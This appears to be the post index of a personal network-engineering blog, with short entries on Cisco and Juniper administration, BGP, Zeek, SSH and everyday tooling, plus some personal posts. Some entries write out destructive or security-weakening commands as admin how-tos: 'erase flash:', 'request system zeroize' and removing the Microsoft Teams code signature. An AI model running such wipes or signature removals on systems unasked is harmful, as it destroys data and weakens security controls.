jemurray@mbp-2019:~/Downloads $ scp -c aes128-cbc c3560c405-universalk9-mz.152-2.E10.bin 192.168.86.42:c3560c405-universalk9-mz.152-2.E10.bin
Password:
c3560c405-universalk9-mz.152-2.E10.bin     3%  624KB  58.0KB/s   05:23 ETA

Pasting images into Hugo markdown with vsCode on macOS

Sat, 24 Oct 2020 10:54:40 -0500

Overview

Paste images directly into markdown code with the vsCode Paste Image plugin.

Before this plugin, adding images to Hugo markdown code required:

Capturing the picture
Move the picture into the static directory
Rename the picture
Add the markdown code with the proper picture name.

After the Paste Image plugin:

Capture the picture
Right click image and save to the clipboard
Paste image into markdown (everything else is automatic)

Details

My Hugo directory structure is setup like this:

SSH: no matching cipher found

Fri, 23 Oct 2020 05:55:47 -0500

On occasion we run across an old Cisco switch that throws the following error when connecting via ssh from a modern client:

jemurray@mbp-2019:~ $ ssh 192.168.86.42
Unable to negotiate with 192.168.86.42 port 22: no matching cipher found. Their offer: aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc

The best solution is to upgrade the software on the switch to something more modern. If that is not possible, use the -c option with ssh to select one of the ciphers presented in the Their offer: section:

Upgrading a Cisco 9300 to 17.3.1

Thu, 22 Oct 2020 09:52:21 -0500

Overview

Steps necessary to upgrade a Cisco 9300 (C9300L-48UXG-4X) from 16.12.x to 17.3.1.

Details

Remove old files:

9300-1#install remove inactive
install_remove: START Thu Oct 22 14:50:36 UTC 2020
Cleaning up unnecessary package files
No path specified, will use booted path flash:packages.conf
Cleaning flash:
  Scanning boot directory for packages ... done.
  Preparing packages list to delete ...
    cat9k-cc_srdriver.16.12.02.SPA.pkg
      File is in use, will not delete.
    cat9k-espbase.16.12.02.SPA.pkg
      File is in use, will not delete.
    cat9k-guestshell.16.12.02.SPA.pkg
      File is in use, will not delete.
    cat9k-rpbase.16.12.02.SPA.pkg
      File is in use, will not delete.
    cat9k-rpboot.16.12.02.SPA.pkg
      File is in use, will not delete.
    cat9k-sipbase.16.12.02.SPA.pkg
      File is in use, will not delete.
    cat9k-sipspa.16.12.02.SPA.pkg
      File is in use, will not delete.
    cat9k-srdriver.16.12.02.SPA.pkg
      File is in use, will not delete.
    cat9k-webui.16.12.02.SPA.pkg
      File is in use, will not delete.
    cat9k-wlc.16.12.02.SPA.pkg
      File is in use, will not delete.
    packages.conf
      File is in use, will not delete.
  done.

The following files will be deleted:
[switch 1]:
/flash/cat9k_iosxe.17.03.01.SPA.bin

Do you want to remove the above files? [y/n]y

[switch 1]:
Deleting file flash:cat9k_iosxe.17.03.01.SPA.bin ... done.
SUCCESS: Files deleted.
--- Starting Post_Remove_Cleanup ---
Performing Post_Remove_Cleanup on all members
  [1] Post_Remove_Cleanup package(s) on switch 1
  [1] Finished Post_Remove_Cleanup on switch 1
Checking status of Post_Remove_Cleanup on [1]
Post_Remove_Cleanup: Passed on [1]
Finished Post_Remove_Cleanup

SUCCESS: install_remove  Thu Oct 22 14:51:41 UTC 2020

Copy new image to flash (265Kb/s is S L O W):

Erasing everything on Cisco IOS flash storage

Wed, 21 Oct 2020 07:11:19 -0500

Files on the flash: storage before erasing:

3560sw-1#dir flash: Directory of flash:/

2  -rwx         736   Mar 1 1993 00:10:59 +00:00  vlan.dat
3  drwx         512   Mar 1 1993 00:13:49 +00:00  c3560-ipservicesk9-mz.122-58.SE1
5  -rwx         850   Mar 1 1993 00:07:11 +00:00  config.text
6  -rwx           5   Mar 1 1993 00:07:11 +00:00  private-config.text
7  -rwx        2072   Mar 1 1993 00:07:11 +00:00  multiple-fs

27998208 bytes total (9958400 bytes free)

Erasing flash:

3560sw-1#erase flash:
Erasing the flash filesystem will remove all files! Continue? [confirm]
mifs[4]: 0 files, 1 directories
mifs[4]: Total bytes     : 27998208
mifs[4]: Bytes used      : 1024
mifs[4]: Bytes available : 27997184
mifs[4]: mifs fsck took 0 seconds.

Erase of flash: complete

flash: is empty:

Catching script execution failures with a semicolon

Tue, 20 Oct 2020 06:27:35 -0500

In bash shell scripting, the ; (seimicolon) is know as the command separator. It separates two commands that run sequentially, one after the other. For example: command-one; command-two.

By using the ;, we can create a watch-dog script to send out an alert if the previous command stops executing. In this example, I want to be notified if the ./longRunningScript.py exits for any reason:

./longRunningScript.py; echo "The script ended" | mail -s "Ut oh, the script ended unexpectedly!" -S smtp=smtp://mail.example.com -v jemurray@example.com

A few hours later I received an email from the watch-dog. After reviewing the console output, it looks like a login failure caused the script to crash:

Zeek Week 2020 - CTF sudo su writeup

Mon, 19 Oct 2020 06:00:35 -0500

Yesterday I posted about my first ZeekWeek Capture the Flag challenge. Today we walk through the details to solve the second CFT challenge.

Using a packet capture from an ssh session, determine the length of the password entered on the command line. The following details were given:

The user SSHed into a system
Public keys performed the initial authentication (ie. no password)
The user typed: sudo su + <their password> + ^d^d

With this information, I set out to reproduce the same scenario. I would ssh into my lab server and reproduce exactly what the CTF challenge did. Then, compare my pattern of packets to their pattern of packets. I presumed there should be obvious similarities between the two captures. If you have not reviewed yesterdays CTF, now is a good time. I talk about using changes in patterns to solve puzzles like these.

Zeek Week 2020 - CTF Man or Machine writeup

Sun, 18 Oct 2020 12:57:10 -0500

This past week I was lucky enough to participate in the ZeekWeek 2020 capture the flag challenge. These are excellent events to pick up a new or hone an existing security related skill. By sharing the thought process behind solving one of these challenges, you get a window into the mind of the people who play, the tools required, and the skills they possess. This is my writeup behind solving challenge #1.

Install Zeek packages with zkg

Sat, 17 Oct 2020 09:33:18 -0500

Overview

Previously we installed Zeek (with Python3 support). Today we will extend Zeek with 3rd party community scripts and plugins . To facilitate searching for and installing packages, the Zeek community developed the Zeek package manager software.

Details

Ubuntu 20.04 is the base operating system Zeek is installed on. There is no longer support for pip in Python 2. Python3 is required:

sudo apt install python3-pip

Install zkg in /usr/local/bin:

sudo pip3 install zkg

Start the basic config:

Installing and running Zeek at home

Fri, 16 Oct 2020 05:31:10 -0500

Overview

What are the devices in your house communicating with? How many different services do your security cameras send information to? Is your TV sending data to foreign countries? What are the kids doing while your gone? Are there any large file transfers happening to places you don’t recognize? Are there any open connections to SSH or RDP ports you are not aware of?

By TAPing and redirecting all traffic entering or leaving the network to a Zeek server, we can start to answer these questions.

Import SSH key from GitHub during Ubuntu install

Thu, 15 Oct 2020 06:16:09 -0500

This is a neat feature. During a Ubuntu 20.04.x installation the initial user can automatically retrieve ssh keys from GitHub:

Right after installation, ssh key authentication works as expected:

jemurray@mbp-2019:~ $ ssh 192.168.86.32
The authenticity of host '192.168.86.32 (192.168.86.32)' can't be established.
ECDSA key fingerprint is SHA256:zd7aT9GlQV2qsONFr2fKrx86ULQvBicSKBo2mrnUnm8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.86.32' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-51-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Oct 14 20:15:43 UTC 2020

  System load:             0.93
  Usage of /:              25.1% of 23.99GB
  Memory usage:            1%
  Swap usage:              0%
  Processes:               270
  Users logged in:         0
  IPv4 address for ens160: 192.168.86.32
  IPv6 address for ens160: 2600:1700:1391:411f:20c:29ff:fe28:bb6e


53 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


Last login: Wed Oct 14 20:15:19 2020
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

They also disabled password authentication by default:

Enable firewalling services with UFW on Ubuntu

Wed, 14 Oct 2020 14:12:18 -0500

By default the firewall is disabled on an Ubuntu server. We can verify this by looking at the iptables rules. In this example, the default policy is set to ACCEPT:

jemurray@home-server:~$ sudo iptables --list -nv
Chain INPUT (policy ACCEPT 7523K packets, 10G bytes)
 pkts bytes target     prot opt in     out     source               destination
   69  2887 ACCEPT     udp  --  ens160 *       0.0.0.0/0            0.0.0.0/0            udp dpt:1194
    0     0 ACCEPT     all  --  tun0   *       0.0.0.0/0            0.0.0.0/0

Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination
    0     0 ACCEPT     all  --  tun0   ens160  0.0.0.0/0            0.0.0.0/0
    0     0 ACCEPT     all  --  ens160 tun0    0.0.0.0/0            0.0.0.0/0

To keep firewall management simple, ufw is used to manage the firewall. We can verify again, there is no firewall running by default:

Calculations from the command-line with bc

Tue, 13 Oct 2020 16:33:52 -0500

bc is a calculator language, it can solve complex arithmetic problems or….

perform basic calculator operations when I need it:

jemurray@mbp-2019:~ $ echo 2+2 | bc
4

Automatic AS prepending with BGP communities on JunOS

Mon, 12 Oct 2020 10:11:07 -0500

Overview

The purpose of this lab is to show how Juniper policy-options can be used to automatically increase AS path length based on community tags attached to routes sent over BGP.

BGP AS path length is one option commonly used to determine the best path to a route on the Internet. The AS path length can also be used to influence how traffic is returned when a specific path is required.

Configuring RPKI on Juniper vMX with the Fort validation server

Sun, 11 Oct 2020 06:15:18 -0500

Overview

In the simplest terms, RPKI helps to solve the problem of trust within routing exchange points. As Internet routers exchange routes through BGP, there is an inherent level of trust that each member will only announce networks they have the authority over. In practice, this works pretty well. There have been a few high profile network hijacking incidents in recent years, but good customer validation and filtering practices limit these occurrences. Diligent use of LoA’s and IRR databases help to ensure network operators or people with malicious intent are kept at bay. RPKI enhances these tools by allowing network owners to cryptographically sign individual network routes.

Organizing applications and workflows with virtual desktops

Sat, 10 Oct 2020 14:21:35 -0500

Throughout the day, my typical work flow revolves around these major areas:

Work communication and task management (webmail and calendar)
Personal communication and task management (webmail and calendar)
Web browsing (work and personal)
Terminal (console applications and remote access)
Virtual communication (text and video)
Note taking
Coding, documentation, and blogging
Other…

My daily driver computer is a MacBook Pro. This setup allows me to move between offices, meetings, and remote work locations without having to switch between devices. The downside of a laptop is the single 15" screen. Desktop space is at a premium. It is not uncommon for me to have 20+ applications open at one time. Organizing the desktop and switching between tasks becomes unwieldy as the application count increases.

Sending email on RedHat 7 with mailx

Fri, 09 Oct 2020 13:41:34 -0500

To send email from a RedHat 7 server with no email server configured:

Install mailx:

sudo yum install mailx

When there is no email server configured, the mailx command will need to utilize a relay server with the -S option:

mailx -s "Test Email" -S smtp=smtp://mail.example.com jemurray@example.com

Full example:

$ echo "This is my test message" | mailx -v -s "Test Email" -S smtp=smtp://mail.example.com jemurray@example.com
Resolving host mail.example.com . . . done.
Connecting to 192.168.112.54:smtp . . . connected.
220 smtp5.mx.example.com ESMTP
>>> HELO RedHatHost.example.com
250 smtp5.mx.example.com
>>> MAIL FROM:<jemurray@RedHatHost.example.com>
250 sender <jemurray@RedHatHost.example.com> ok
>>> RCPT TO:<jemurray@example.com>
250 recipient <jemurray@example.com> ok
>>> DATA
354 go ahead
>>> .
250 ok:  Message 21861950 accepted
>>> QUIT
221 smtp5.mx.example.com

Erasing JunOS configuration

Thu, 08 Oct 2020 10:36:05 -0500

To factory clear or erase the entire configuration on a JunOS device, use the request system zeroize command:

root@srx-lab> request system zeroize
warning: System will be rebooted and may not boot without configuration
Erase all data, including configuration and log files? [yes,no] (no) yes

warning: zeroizing re0

root@srx-lab> Waiting (max 60 seconds) for system process `vnlru' to stop...done
Waiting (max 60 seconds) for system process `vnlru_mem' to stop...done
Waiting (max 60 seconds) for system process `bufdaemon' to stop...done
Waiting (max 60 seconds) for system process `syncer' to stop...
Syncing disks, vnodes remaining...0 0 0 done

syncing disks... All buffers synced.
Uptime: 8m11s
Rebooting...

Provisioning BGP filters with bgpq3

Wed, 07 Oct 2020 12:56:14 -0500

Overview

This week, we learned how to create BGP prefix filter lists. Today we discuss tools to aid in the creation of prefix-lists using publicly available information from the IRR database RADb.

These tools are geared more towards service providers, but is worth understanding the techniques and filtering mechanisms providers use to prevent network hijacking in the global routing table.

Details

bgpq3 queries the RADb IRR and returns routes as documented by the ASN / network owners. In this example, Washington University in St. Louis publishes the prefixes they announce in an IRR. By using bgpq3 this information is automatically gathered and presented in a format that can be pasted directly into the native router filtering language:

BGP prefix filtering on a Juniper vMX within logical systems

Tue, 06 Oct 2020 11:53:18 -0500

Overview

Expanding on yesterday’s BGP Peering configuration. Today we enable basic BGP prefix filtering.

Exchanging routes on the Internet through BGP requires a fair bit of trust in the downstream organization to only send routes they are authoritative for. Without proper filtering, anyone could announce Googles 8.8.8.0/24 route and potentially redirect this critical DNS traffic back to a rogue location.

For a service provider, it is critical to deny all inbound prefixes and only allow those which are properly authorized to do so. Proper LoAs and routing registries are necessary to validate subnet ownerships.

Basic BGP configuration with Juniper logical systems

Mon, 05 Oct 2020 16:30:52 -0500

Overview

In this example, we provide the basic configuration for two Juniper vMX logical systems to exchange 6 eBGP routes with each other.

Each major area of configuration is detailed with inline comments (#).

The Configuration

Create the logical systems point-to-point interfaces:

# Logical System 1
# Each interface in a logical system needs a unique unit ID
set logical-systems LogicalSystem-1 interfaces lt-0/0/0 unit 101 description "LogicalSystem-2 P2P Interface"
set logical-systems LogicalSystem-1 interfaces lt-0/0/0 unit 101 encapsulation ethernet
# The unit ID is used to connect the logical tunnel interfaces
set logical-systems LogicalSystem-1 interfaces lt-0/0/0 unit 101 peer-unit 201
# A /31 is used to conserve IP space (yes, you can use .0 as a valid interface)
set logical-systems LogicalSystem-1 interfaces lt-0/0/0 unit 101 family inet address 192.168.99.0/31

# Logical System 2
set logical-systems LogicalSystem-2 interfaces lt-0/0/0 unit 201 description "LogicalSystem-1 P2P Interface"
set logical-systems LogicalSystem-2 interfaces lt-0/0/0 unit 201 encapsulation ethernet
set logical-systems LogicalSystem-2 interfaces lt-0/0/0 unit 201 peer-unit 101
set logical-systems LogicalSystem-2 interfaces lt-0/0/0 unit 201 family inet address 192.168.99.1/31

Create basic BGP peering:

Creating logical tunnels within logical systems on JunOS

Sun, 04 Oct 2020 16:32:54 -0500

Overview

Logical systems are a feature within the JunOS operating system to create virtual routers within a single physical platform. Virtualizing the routing platform allows users to maximize resources, separate work loads, or partition services without needing to purchase and install physically separate hardware.

A virtual router has limited use if not connected to other routers. To connect multiple logical systems, there are two main options:

Connect each instance with physical interfaces and cables. (Note: On Cisco’s VDCs this is the only option).
Create logical tunnels which act as virtual interfaces between logical systems.

Details

Create the logical systems and interfaces.

Using SSH as a proxy to servers on the internal network

Sat, 03 Oct 2020 16:10:46 -0500

Overview

To access servers on my internal home network from remote locations I use the port-forwarding capabilities of the service provider router (AT&T Router) and an internal SSH jumpbox (Ubuntu Server). This combination allows me to access any internal systems without the need for a VPN or third-party connection brokerage service.

The network is configured as follows:

Details

On the AT&T router, setup port-forwarding:

home-server 00:0c:29?49:db:fc 192.168.86.5 22 -> 22 (TCP)

I use a dynamic DNS service to keep track of the IP address provided to my home router. The DNS name murray-home.ddns.net is automatically updated if it changes.

Search and replace with sed

Fri, 02 Oct 2020 18:22:00 -0500

$ echo "This is a test" | sed -e 's/a test/how you search and replace with sed./g'

This is how you search and replace with sed.

Allison Turned 17 Today

Thu, 01 Oct 2020 19:19:34 -0500

Seventeen years ago two newly minted parents strapped this little kid into a car seat and drove home.

Happy birthday Allison! You have grown up to be a kind, intelligent, compassionate, and caring person. I am proud to be your dad. I look forward to watching you change the world.

Cat hole cable run...

Wed, 30 Sep 2020 19:35:38 -0500

In order to gather consistent results while performing speed tests this afternoon, I needed a 1Gb/s link upstairs. Wireless would not do for these tests.

Luckily there is a cat hole in the wall:

Down the basement stairs:

Hanging in the air to the router in the rack. Don’t worry, I tied the cable in a knot around the rack. This way if someone tripped over the wire while walking down the stairs it won’t knock the router off the top shelf:

Cisco AnyConnect 4.x 200Mb/s max throughput

Tue, 29 Sep 2020 15:37:31 -0500

Last week I upgraded to the ATT 1G fiber service. This gave me a chance to retest the Cisco AnyConnect client VPN beyond the 100Mb/s cable modem previously in use.

AnyConnect client: 4.8.x and 4.9.02028
Cisco ASA: 9.12(3)12

Cisco has another bug that limits the AnyConnect VPN client to ~200Mb/s:

jemurray@mbp-2019:~ $ iperf3 -c 128.252.5.113 -i 1 -t 10
Connecting to host 128.252.5.113, port 5201
[  5] local 10.227.227.25 port 61227 connected to 128.252.5.113 port 5201
[ ID] Interval           Transfer     Bitrate
[  5]   0.00-1.00   sec  13.7 MBytes   115 Mbits/sec
[  5]   1.00-2.00   sec  16.4 MBytes   137 Mbits/sec
[  5]   2.00-3.00   sec  14.5 MBytes   122 Mbits/sec
[  5]   3.00-4.00   sec  21.8 MBytes   183 Mbits/sec
[  5]   4.00-5.00   sec  21.2 MBytes   178 Mbits/sec
[  5]   5.00-6.00   sec  20.8 MBytes   174 Mbits/sec
[  5]   6.00-7.00   sec  19.4 MBytes   163 Mbits/sec
[  5]   7.00-8.00   sec  21.7 MBytes   182 Mbits/sec
[  5]   8.00-9.00   sec  17.2 MBytes   144 Mbits/sec
[  5]   9.00-10.00  sec  19.2 MBytes   161 Mbits/sec
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval           Transfer     Bitrate
[  5]   0.00-10.00  sec   186 MBytes   156 Mbits/sec                  sender
[  5]   0.00-10.02  sec   185 MBytes   155 Mbits/sec                  receiver


jemurray@mbp-2019:~ $ iperf3 -c 128.252.5.113 -i 1 -t 10 -R
Connecting to host 128.252.5.113, port 5201
Reverse mode, remote host 128.252.5.113 is sending
[  5] local 10.227.227.25 port 61248 connected to 128.252.5.113 port 5201
[ ID] Interval           Transfer     Bitrate
[  5]   0.00-1.00   sec  23.0 MBytes   193 Mbits/sec
[  5]   1.00-2.00   sec  28.0 MBytes   235 Mbits/sec
[  5]   2.00-3.00   sec  27.9 MBytes   234 Mbits/sec
[  5]   3.00-4.00   sec  23.0 MBytes   193 Mbits/sec
[  5]   4.00-5.00   sec  25.6 MBytes   215 Mbits/sec
[  5]   5.00-6.00   sec  26.2 MBytes   220 Mbits/sec
[  5]   6.00-7.00   sec  25.9 MBytes   217 Mbits/sec
[  5]   7.00-8.00   sec  25.7 MBytes   216 Mbits/sec
[  5]   8.00-9.00   sec  25.3 MBytes   212 Mbits/sec
[  5]   9.00-10.00  sec  26.0 MBytes   218 Mbits/sec
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval           Transfer     Bitrate         Retr
[  5]   0.00-10.02  sec   263 MBytes   220 Mbits/sec  131             sender
[  5]   0.00-10.00  sec   257 MBytes   215 Mbits/sec                  receiver

The bug report is documented here:

The many queries of whois

Mon, 28 Sep 2020 15:36:55 -0500

Summary

The whois command can return more than domain name information. Abuse contacts, subnet owners, ISP peerings, ASN mappings, are some of the databases whois can query.

Depending on specific software and version, the whois command may automatically determine the type of information requested. On macOS, looking up subnet owner, ASN, or domain name does not require any special options. For clients that do not support this feature, the -h <server> option must be specified.

A few MacBook features that don't get enough credit

Sun, 27 Sep 2020 13:45:22 -0500

Time Machine

A backup system must be simple, reliable, and hands off. A system that requires to much care-and-feeding, will be forgotten about until it is too late. Time Machine is a set-it-once-and-never-touch-it-again-until-you-need-it. Attach a large enough external USB drive, answer a few questions, and Apple will take care of the rest. Leave the drive plugged in and the system will take hourly backups.

My backup drives sit behind the laptop. Out of sight out of mind. It just works.

Bulk adding Infoblox host records with the infoblox_client library

Sat, 26 Sep 2020 22:54:21 -0500

In the technology field there are many different ways to solve a problem. Yesterday, I wrote about switching from ibcli to ansible to perform mass updates of host records in Infoblox.

Today, I will solve the same problem using Python instead of Ansible. Choosing the right tool for the job can be a daunting task. Having a broad set of experiences and skills will make the selection process easier.

The Python script to bulk add Host records in Infoblox:

Adding host records to Infoblox with Ansible

Fri, 25 Sep 2020 13:28:48 -0500

Entering tens or hundreds of DNS entries in Infoblox from the GUI is a slow process. Previously, I used the IBCLI which is showing its age. I am concerned future updates may make it obsolete at some point.

A more modern approach is a configuration tool like Ansible or the restAPI.

The following playbook has an array of key/value pairs which contain hostname and IP information for the host_record task. It is much easier to update a text file with the basic key/value pairs then clicking several times for each host record in the GUI.

Convert HEIC to JPG from the commandline

Thu, 24 Sep 2020 06:13:08 -0500

By default pictures taken from an iPhone are stored in HEIC format. I find that most of the systems I interact with do not support HEIC. Converting a large number of photos is tedious with the traditional GUI applications.

ImageMagick has the mogrify command line tool to quickly batch convert any number of files with a single command. ImageMagick is not installed by default. Use brew to install if necessary: brew install imagemagick.

AT&T residential fiber service - 1G FTTH

Wed, 23 Sep 2020 17:16:25 -0500

Overview

AT&T 1G fiber service was installed at the house today. The fiber service was pulled into our neighborhood about 2 years ago. I put off switching because of the cost at first, then it was the hassle of switching services. Now that the entire family is either working or doing online schooling from home, it was time to upgrade. The 100 down / 7 up Spectrum service is no longer adequate.

How to fix Microsoft Teams poor audio and video over VPN

Tue, 22 Sep 2020 13:36:57 -0500

Overview

Microsoft Teams is experiencing poor audio and video problems when clients are connected to the Cisco AnyConnect VPN gateway. We are able to consistently reproduce this problem by establishing a call between two users using the chat option in Teams. Both users must be connected to the same VPN gateway.

The problem does NOT exist when a call is established through a meeting or when multiple users are in a group call. Only singleuser-to-singleuser calls experience poor connection quality.

Default app bug in iOS14

Mon, 21 Sep 2020 17:12:07 -0500

Yesterday, I touted how great it was to be able to set a default app in iOS14. It is great, as long as the devices is not rebooted.

After a reboot the settings are reset back to the default.

Apple confirmed this is a bug.

iOS14 supports default opening of third party apps

Sun, 20 Sep 2020 12:34:01 -0500

New to iOS14 is a feature I have been requesting for years. The ability to select the default application. Without this feature, if an app needed to display a web page, send an email, or map an address, the only option was to use the software provided by Apple. There was no option to open these links using third party apps. While many people were fine using Apples Safari, mail, or maps, I was not. I prefer Chrome, Gmail, and Waze.

Easy french press coffee

Sat, 19 Sep 2020 08:52:26 -0500

Why

If you found this page because you are in search of a no frills french press coffee recipe, keep reading.

First, don’t overthink. Making coffee does not have to be complicated. Follow these directions. The coffee will be great.

There are hundreds of articles on how to make the “best” french press coffee. I have tried quite a few. Remember, taste is subjective, the best coffee is the one you enjoy drinking. “Experts” will recommend specific pots or stirring materials, most of this is unnecessary. Buy an average french press and use standard kitchen gear for everything else.

We Believe

Fri, 18 Sep 2020 15:15:58 -0500

Combined with action, a sign helps to socialize a positive message to neighbors and friends.

Be the positive change we need.

Following an unsolicited text message link

Thu, 17 Sep 2020 06:34:07 -0500

Intro

I rarely receive unsolicited text messages. Starting in August 2020 that changed. There are now between 2 and 3 messages a week. They all revolve around ’lost packages’, ‘porn’, and ‘work from home’.

NEVER click a unsolicited link sent via text or email. There is a good chance it is spam, phishing, or some type of malware. Clicking these links lets the sender know the phone number or email address is valid and someone is reading what they are sending. This is a sure fire way to get your phone number added to even more campaigns.

Find the typo with diff

Wed, 16 Sep 2020 13:23:05 -0500

Use diff, find the error, fix the error, make everyone happy. Syslog works again.

In this example, diff is used to compare the original file that works, with the new configuration file that breaks syslog. Can you spot the typo?

Scan for the changes in the side-by-side comparison. Pay close attention to the differences in patterns. I bet you didn’t realize Sesame Street has been preparing us this entire time to spot errors in syslog configuration files:

Personalized athletic video recording with Trace

Tue, 15 Sep 2020 14:58:26 -0500

My daughter’s ECNL soccer team recently purchased the Trace player tracking and video recording system. Many of the players use this league as a springboard to play soccer in college. A big part of applying to colleges is building highlight videos to show off player skills. We could easily spend an entire day going through hours of video looking for enough clips to build a 5 minute highlight reel.

The Trace camera system eliminates all the manual labor involved in watching and clipping specific parts. Each player wears a lightweight GPS receiver. This device records every position, movement, and speed of the player. A 180 degree pole mounted camera replaces the traditional camera-parent. The camera automatically pans and zooms based on position of the ball on the field. After the game is over, video and GPS data is sent to the cloud for post processing. Tracer overlays player information on each video. Players receive an email with links to their individual highlight clips.

Big ASCII letters with figlet

Mon, 14 Sep 2020 16:00:32 -0500

I am an old school nerd from a time when ASCII art was king. Printers were dot matrix. Tractor-feed continuos paper made great banners. The Print Shop was high tech publishing software.

When ASCII nostalgia strikes, figlet is here to help.

jemurray@shell:~$ figlet Hello World!
 _   _      _ _        __        __         _     _ _
| | | | ___| | | ___   \ \      / /__  _ __| | __| | |
| |_| |/ _ \ | |/ _ \   \ \ /\ / / _ \| '__| |/ _` | |
|  _  |  __/ | | (_) |   \ V  V / (_) | |  | | (_| |_|
|_| |_|\___|_|_|\___/     \_/\_/ \___/|_|  |_|\__,_(_)

How about really old school with the # 1980’s pixel:

GNS3 web interface

Sun, 13 Sep 2020 05:45:05 -0500

Overview

For those people using the GNS3 VM, you may not need to download the GNS3 desktop client anymore. The GNS3 VM comes with a web interface enabled by default.

Accessing the web interface

Main topology menu:

Viewing a project:

Accessing the router through the integrated web console:

Remote access over an SSH tunnel

My GNS3 server is physically located in my home lab. As someone who likes to test new ideas while on the road, I can start a SSH tunnel to access the lab from any remote location. In fact, I am writing this post and working in the lab from a hotel room.

Using openssl to connect to SSL enabled services

Sat, 12 Sep 2020 16:16:00 -0500

Overview

When I need to make a connection to an SSL enabled service or validate SSL certificate information, I use the openssl command.

This command allows me to connect to any SSL enabled service and validate key SSL certificate information, all within a single command. On most unix systems openssl is installed by default, and is considered by many to be the swiss army knife of SSL tools.

Summary of common OpenSSL commands:

Web server:

FQDN DNS updates using DHCP Option 81

Fri, 11 Sep 2020 08:43:02 -0500

Overview

Integrating DHCP with a DNS server, allows devices to register a fully qualified domain when requesting an IP address. This type of automatic DNS update, is known as dynamic DNS or DDNS. Dynamic DNS is helpful because humans find it easier to remember host.example.com then 192.168.212.123. If IPv6 is used, dynamic DNS is even more important. Not many people can easily remember an IPv6 address: 2604:3e00:123:4534:123:2332::1.

Options

There are 2 primary types of DDNS updates the DHCP server can perform:

Use Splunk to count DNS queries by hour

Thu, 10 Sep 2020 16:34:38 -0500

Splunk search string to count DNS queries logged from Zeek by hour:

index="prod_infosec_zeek" source = /logs/zeek/current/dns.log  NOT rcode_name = NXDOMAIN | eval c_time=strftime(ts,"%m/%d/%y %H") | table c_time | stats count by c_time

Splunk results:

c_time	count
...
09/10/20 12	8563941
09/10/20 13	27413725
09/10/20 14	33185289
09/10/20 15	30942267
09/10/20 16	22590486
09/10/20 17	3876147
...

The query works by converting the EPOCH timestamp Zeek creates into the human readable format: month/day/year hour. It then sorts and counts the dates to get hourly stats.

Network security segmentation is a mess

Wed, 09 Sep 2020 17:01:00 -0500

I am about to make a presumptuous statement…

I believe the vast majority of enterprise networks are a convoluted mess because of security segmentation.

Yes, I said it, network security is a horrible mess. Cisco, Juniper, or insert any other large vendor, make a network engineers life miserable. There is no good single solution when it comes to designing and implementing good security practices. Ask 100 engineers and you will get 99 different answers.

Be on the lookout for graph smoothing

Tue, 08 Sep 2020 15:48:00 -0500

Where did the traffic spikes go?

Take caution when using long term graphs for network capacity planning. In order to visualize historical interface trending information on a reasonably sized graph, the data needs to be averaged. This may smooth out important spikes that would otherwise indicate interface congestion.

Looking at a 24 hour graph with 1 minute resolution, it is easy to spot 9Gb/s spikes throughout the day. The graph is a reasonable size and the data paints a good picture of an interface nearing a congestion problem:

Take a break for your health

Mon, 07 Sep 2020 15:04:17 -0500

Now that we are working from home full time, I don’t get out of my chair nearly as often. This sedentary practice is taking a noticeable toll on my back, legs, and eyes.

My running watch has a move alert, but it is easy to ignore or completely miss when deeply concentrating on solving todays problem. I needed something that grabs my attention and forces me to take action. The macOS software, Time Out, fits my needs perfectly.

Accessing a serial console via the macOS terminal

Sun, 06 Sep 2020 14:17:16 -0500

Quick Start

The command cu can be used to connect to a serial console on macOS (and most any other unix based operating systems). There are lots of other commands that will work as serial consoles, but this command comes installed by default and is easy to use. In fact many unix based systems have cu installed by default. Don’t bother with other tools, cu is lightweight and works well.

Configure WiFi with a QR code

Sat, 05 Sep 2020 13:15:35 -0500

What if I told you, configuring guests on your home WiFi network is as easy as scanning this QR Code:

Too many residential routers come with stock wireless names like MySpectrumWifiNetwork-5G and a password that takes 5 tries to enter properly on a tiny phone keyboard: akhajadkjhafd7a7adfhahjadfayadfyuadgf. Most people will give up after the 2nd try. Leaving your guests to pay for cellular data, instead of sipping the sweet nectar of that One Gig fiber-service you pay so dearly for.

Whole Wheat Flax Blueberry Pancakes

Fri, 04 Sep 2020 13:34:37 -0500

This is my favorite whole wheat blueberry pancake recipe. To my dismay the original website disappeared for a while and I never saved a copy. Luckily, there are a number of people on the Internet who keep backup copies of content just like this. If it disappears again, fear not for I now have a copy for all to enjoy.

Original source: https://healthontherun.wordpress.com/2010/04/03/whole-wheat-flax-blueberry-pancakes/

The basic recipe that I use is below. This has been adapted from several different sources (that I can no longer remember!) and tends to vary a bit from time to time. Also (as a disclaimer), I’m not a very precise cook, and would prefer to just dump and mix when I can get away without measuring. But for those logical people out there who actually like to trust that your food is going to come out okay when you make something, here are the ingredients.

Enable OBS Virtual Camera in Microsoft Teams

Thu, 03 Sep 2020 08:32:19 -0500

In July 2020, a Microsoft Teams update disabled 3rd party virtual camera support. Microsoft acknowledged the issue here: https://docs.microsoft.com/en-us/microsoftteams/troubleshoot/teams-on-mac/virtual-camera-doesnt-work-macos

The issue stems from the way Apple codesigns CoreMediaIO 3rd party plugins.

To resolve this problem, the codesign signature from Microsoft Teams must be removed.

Open a terminal and run the following commands:

sudo codesign --remove-signature "/Applications/Microsoft Teams.app"
sudo codesign --remove-signature "/Applications/Microsoft Teams.app/Contents/Frameworks/Microsoft Teams Helper.app"

The OBS Virtual Camera is visible in Teams:

Basic aspath-regex

Wed, 02 Sep 2020 17:08:55 -0500

Overview

The world of regular expressions seems like magic or voodoo to many newcomers. RegEx at its most basic form is nothing more then simple pattern matching expressions. I see many seasoned network engineers overlook this powerful tool because of the perceived complexity. Sure, there are some very complex regular expressions and the language is limitless. Don’t be overwhelmed, start with the basics and work up to more complex patterns as needed.

Using grepcidr to find IP addresses in text files

Tue, 01 Sep 2020 14:49:06 -0500

